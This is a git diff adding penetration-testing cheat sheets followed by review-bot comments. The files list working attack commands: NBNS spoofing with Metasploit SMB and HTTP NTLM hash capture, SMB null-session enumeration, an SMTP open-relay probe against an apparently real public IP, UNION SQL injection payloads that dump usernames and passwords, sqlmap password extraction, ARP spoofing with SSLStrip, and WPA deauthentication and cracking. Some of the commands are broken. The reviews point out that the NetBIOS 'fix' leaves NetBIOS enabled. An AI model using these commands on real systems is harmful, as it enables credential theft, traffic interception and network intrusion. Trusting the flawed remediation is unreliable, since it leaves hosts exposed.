@@ -0,0 +1,57 @@ +[+] NBNS Spoof / Capture + +[>] NBNS Spoof +msf > use auxiliary/spoof/nbns/nbns_response +msf auxiliary(nbns_response) > show options +msf auxiliary(nbns_response) > set INTERFACE eth0 +msf auxiliary(nbns_response) > set SPOOFIP 10.10.10.10 +msf auxiliary(nbns_response) > run + +[>] SMB Capture + +msf > use auxiliary/server/capture/smb +msf auxiliary(smb) > set JOHNPWFILE /tmp/john_smb +msf auxiliary(smb) > run + +[>] HTTP NTML Capture + +msf auxiliary(smb) > use auxiliary/server/capture/http_ntlm +msf auxiliary(smb) > set JOHNPWFILE /tmp/john_http +msf auxiliary(smb) > set SRVPORT 80 +msf auxiliary(smb) > set URIPATH / +msf auxiliary(smb) > run + + +Fix: +http://www.leonteale.co.uk/netbios-nbns-spoofing/ + +Solution +The solution to this is to disable Netbios from broadcasting. The setting for this is in, what i hope, a very familiar place thaet you might not have really paid attention too before. +netbios + +Netbios, according to Microsoft, is no longer needed as of Windows 2000. +However, there are a few side effects. +One of the unexpected consequences of disabling Netbios completely on your network is how this affects trusts between forests. Windows 2000 let you create an external (non-transitive) trust between a domain in one forest and a domain in a different forest so users in one forest could access resources in the trusting domain of the other forest. Windows Server 2003 takes this a step further by allowing you to create a new type of two-way transitive trusts called forest trusts that allow users in any domain of one forest access resources in any domain of the other forest. Amazingly, NetBIOS is actually still used in the trust creation process, even though Microsoft has officially “deprecated” NetBIOS in versions of Windows from 2000 on. So if you disable Netbios on your domain controllers, you won’t be able to establish a forest trust between two Windows Server 2003 forests. 
+But Windows 2003 is pretty old, since as of writing we are generally on Windows 2012 now. So if you would like to disable Netbios on your servers yet will be effected by the side effect for Forest trusts then ideally you should upgrade and keep up with the times anyway. alternatively, you can get away with, at the very least, disabling Netbios on your workstations. +See below for step by step instructions on disabling Netbios on workstations: + +Windows XP, Windows Server 2003, and Windows 2000 +On the desktop, right-click My Network Places, and then click Properties. +Right-click Local Area Connection, and then click Properties +In the Components checked are used by this connection list, double-click Internet Protocol (TCP/IP), clickAdvanced, and then click the WINS tab.Note In Windows XP and in Windows Server 2003, you must double-click Internet Protocol (TCP/IP) in the This connection uses the following items list. +Click Use NetBIOS setting from the DHCP server, and then click OK three times. + +For Windows Vista +On the desktop, right-click Network, and then click Properties. +Under Tasks, click Manage network connections. +Right-click Local Area Connection, and then click Properties +In the This connection uses the following items list, double-click Internet Protocol Version 4 (TCP/IPv4), clickAdvanced, and then click the WINS tab. +Click Use NetBIOS setting from the DHCP server, and then click OK three times. + +For Windows 7 +Click Start, and then click Control Panel. +Under Network and Internet, click View network status and tasks. +Click Change adapter settings. +Right-click Local Area Connection, and then click Properties. +In the This connection uses the following items list, double-click Internet Protocol Version 4 (TCP/IPv4), clickAdvanced, and then click the WINS tab. +Click Use NetBIOS setting from the DHCP server, and then click OK three times. \ No newline at end of file 
diff --git a/Cheatsheet_SMBEnumeration.txt b/Cheatsheet_SMBEnumeration.txt new file mode 100644 index 0000000..ee46260 --- /dev/null +++ b/Cheatsheet_SMBEnumeration.txt @@ -0,0 +1,35 @@ +SMB Enumeration Techniques using Backtrack: + +1. NBTSCAN + +root@bt:~# nbtscan -r 10.0.2.0/24 +Doing NBT name scan for addresses from 10.0.2.0/24 + +IP address NetBIOS Name Server User MAC address +------------------------------------------------------------------------------ +10.0.2.0 Sendto failed: Permission denied +10.0.2.10 +10.0.2.15 METASPLOITABLE METASPLOITABLE 00-00-00-00-00-00 +10.0.2.18 TEST01 TEST01 00-11-21-22-1d-4d +10.0.2.45 TEST04 TEST04 00-12-d2-34-11-55 + +2. NMAP + +nmap -p 1-65535 -T4 -O -A -v 10.0.2.15 + +3. SMBCLIENT + +root@bt:~# smbclient -L=10.0.2.15 + +Null Sessions + +root@bt:~# smbclient \\\\10.0.2.15\\tmp +Enter root's password: +Anonymous login successful + + +SMB Enumeration Techniques using Windows Tools: + +1. NetBIOS Enumerator (nbtenum) + +http://nbtenum.sourceforge.net/ \ No newline at end of file diff --git a/Cheatsheet_SMTPOpenRelay.txt b/Cheatsheet_SMTPOpenRelay.txt new file mode 100644 index 0000000..dda1dba --- /dev/null +++ b/Cheatsheet_SMTPOpenRelay.txt @@ -0,0 +1,8 @@ +[+] SMTP Open Relay Commands + +[-] ncat -C 86.54.23.178 25 +[-] HELO mail.co.uk +[-] MAIL FROM: +[-] RCPT TO: +[-] DATA +Test Email \ No newline at end of file diff --git a/Cheatsheet_SQLInjection.txt b/Cheatsheet_SQLInjection.txt new file mode 100644 index 0000000..f6e0d4d --- /dev/null +++ b/Cheatsheet_SQLInjection.txt 
@@ -0,0 +1,20 @@ +[+] Union Based SQL Injection + +' or 1=1# + +1' ORDER BY 10# + +1' UNION SELECT version(),2# + +1' UNION SELECT version(),database()# + +1' UNION SELECT version(),user()# + +1' UNION ALL SELECT table_name,2 from information_schema.tables# + +1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"# + +1' UNION ALL SELECT concat(user,char(58),password),2 from users# + + +sqlmap --url="" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs \ No newline at end of file diff --git a/Cheatsheet_SSLStrip.txt b/Cheatsheet_SSLStrip.txt new file mode 100644 index 0000000..bdec2bf --- /dev/null +++ b/Cheatsheet_SSLStrip.txt @@ -0,0 +1,10 @@ +1) Flip your machine into forwarding mode (as root): +echo "1" > /proc/sys/net/ipv4/ip_forward + +2) Setup iptables to intercept HTTP requests (as root): +iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 + +3) sslstip.py -l 8080 -f lock.ico + +4) Run arpspoof to redirect traffic to your machine (as root): +arpspoof -i -t \ No newline at end of file diff --git a/Cheatsheet_WirelessTesting.txt b/Cheatsheet_WirelessTesting.txt new file mode 100644 index 0000000..4b0514d --- /dev/null +++ b/Cheatsheet_WirelessTesting.txt 
@@ -0,0 +1,66 @@ +WPA PSK attack with aircrack-ng suite. +-------------------------------------- + +Place your wireless card into Monitor Mode +airmon-ng start wlan0 + +Detect all available wireless AP’s and clients +airodump-ng mon0 + +Setting adapter channel +iwconfig mon0 channel + +Capturing the four-way handshake +airodump-ng --channel --bssid --write capture mon0 + +You can capture the handshake passively (it takes time) or de-authenticate a client. + +De-authentication attack +aireplay-ng --deauth 3 -a -c mon0 + +Deauth every client - aireplay-ng -0 5 -a mon0 + +Dictionary Attack +aircrack-ng -w passwords.lst capture-01.cap + +Brute force Attack +crunch 8 8 0123456789 | aircrack-ng -e "Name of Wireless Network" -w - /root/home/wpa2.eapol.cap + + +WEP attack with aircrack-ng suite. +---------------------------------- + +Place your wireless card into Monitor Mode +airmon-ng start wlan0 + +Detect all available wireless AP’s and clients +airodump-ng mon0 + +Setting adapter channel +iwconfig mon0 channel + +airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface) + +aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface) + +aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface) + +aircrack-ng -b (bssid) (file name-01.cap) + + +Rogue Access Point Testing +-------------------------- + +# ifconfig wlan0 down +# iw reg set BO +# iwconfig wlan0 txpower 0 +# ifconfig wlan0 up +# airmon-ng start wlan0 +# airodump-ng --write capture mon0 + +root@backbox:/home/backbox# ifconfig wlan1 down +root@backbox:/home/backbox# iw reg set BO +root@backbox:/home/backbox# ifconfig wlan1 up +root@backbox:/home/backbox# iwconfig wlan1 channel 13 +root@backbox:/home/backbox# iwconfig wlan1 txpower 30 +root@backbox:/home/backbox# iwconfig wlan1 rate 11M auto \ No newline at end of file
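Review bot: the hunk at @@ -253,9 +243,6 @@ in Cheatsheet_PenTesting.txt deletes the "[+] Cracking Cached Domain/AD Passwords / Irongeek - Cachecrack" entry with no replacement, yet the commit message only says "Added more cheatsheets". If the removal is deliberate (tool retired, or the content moved into one of the new files such as Cheatsheet_LocalSamDump.txt), say so in the commit message; otherwise keep the entry, since the neighbouring PwDump and Mimikatz lines cover remote SAM and in-memory logon credentials but say nothing about cached domain logons.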
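Review bot: the remediation in Cheatsheet_SMBCapture.txt contradicts its own goal: the "Solution" paragraph says the fix is to "disable Netbios", but each step-by-step block ends with "Click Use NetBIOS setting from the DHCP server", which is the default radio option on the WINS tab and leaves NetBIOS over TCP/IP enabled unless the DHCP server hands out a disable setting; the option that actually disables it on that same tab is "Disable NetBIOS over TCP/IP". Three smaller points in the same file: "HTTP NTML Capture" should read "HTTP NTLM Capture"; the prompt after "use auxiliary/server/capture/http_ntlm" would be "msf auxiliary(http_ntlm) >", not "msf auxiliary(smb) >"; and the "Fix:" section pastes the linked leonteale.co.uk post verbatim, stray "netbios" image caption and typos ("thaet", "too", "effected") included, where a one-line summary plus the link would be clearer.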
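Review bot: the "Null Sessions" example in Cheatsheet_SMBEnumeration.txt shows the "Enter root's password:" prompt but never says the password is left blank, which is the whole point of the test; add `-N` (no password prompt) to the smbclient line or state that the prompt is answered with an empty line. The "SMB Enumeration Techniques using Windows Tools" section is only a URL for nbtenum with no usage, so it adds nothing over a link, and the nbtscan sample row "10.0.2.0 Sendto failed: Permission denied" is the network address rather than a host and should be dropped from the output excerpt.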
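Review bot: in Cheatsheet_SMTPOpenRelay.txt the "MAIL FROM:" and "RCPT TO:" lines carry no addresses, and the DATA section has no terminating line consisting of a single "." and no QUIT, so the sequence as written never completes a message and cannot show whether the relay accepted it; put placeholder addresses on those lines and add the terminator. The target "86.54.23.178" looks like a real public address; a published cheat sheet should use a documentation range such as 192.0.2.0/24 (RFC 5737). The "[-]" prefix is used both for the ncat command and for the SMTP verbs typed inside the session, which hides which lines are shell and which are protocol.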
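Review bot: the sqlmap line in Cheatsheet_SQLInjection.txt has an empty `--url=""`, so it fails as written; use an obvious placeholder instead. The header "[+] Union Based SQL Injection" does not match the first payload (`' or 1=1#` is a boolean test, not a UNION query), and nothing says the payloads are MySQL-specific (version(), database(), information_schema, the `#` comment and char(58) all are); a DBMS label at the top of the file would make those assumptions explicit.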
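Review bot: step 3 in Cheatsheet_SSLStrip.txt misspells the tool as "sslstip.py" (it is "sslstrip.py") and, unlike steps 1, 2 and 4, has no description of what it does. Step 4's "arpspoof -i -t" has lost its interface and target arguments, so write them as explicit placeholders. The iptables REDIRECT rule in step 2 is never removed; add the matching `-D` line (or a note to flush the nat table) so the test host is not left redirecting port 80 after the engagement.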
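Review bot: several commands in Cheatsheet_WirelessTesting.txt have lost their arguments: "iwconfig mon0 channel" (twice), "airodump-ng --channel --bssid --write capture mon0", "aireplay-ng --deauth 3 -a -c mon0" and "aireplay-ng -0 5 -a mon0" are missing the channel, BSSID and client MAC values and fail as written; use the "(channel)", "(bssid)", "(interface)" placeholder style the WEP section already uses throughout. The "Rogue Access Point Testing" block is a bare list of commands with no description, and its two halves disagree ("iwconfig wlan0 txpower 0" in the first, "iwconfig wlan1 txpower 30" after "iw reg set BO" in the second) without saying which is intended; "iw reg set BO" changes the regulatory domain so that the higher txpower is accepted, and that should be stated, since the permitted limit depends on where the test is run. The second block should also drop the "root@backbox:/home/backbox#" prompts to match the "# " style above it, and this file, like SMBCapture, SMBEnumeration, SMTPOpenRelay, SQLInjection and SSLStrip, lacks a trailing newline.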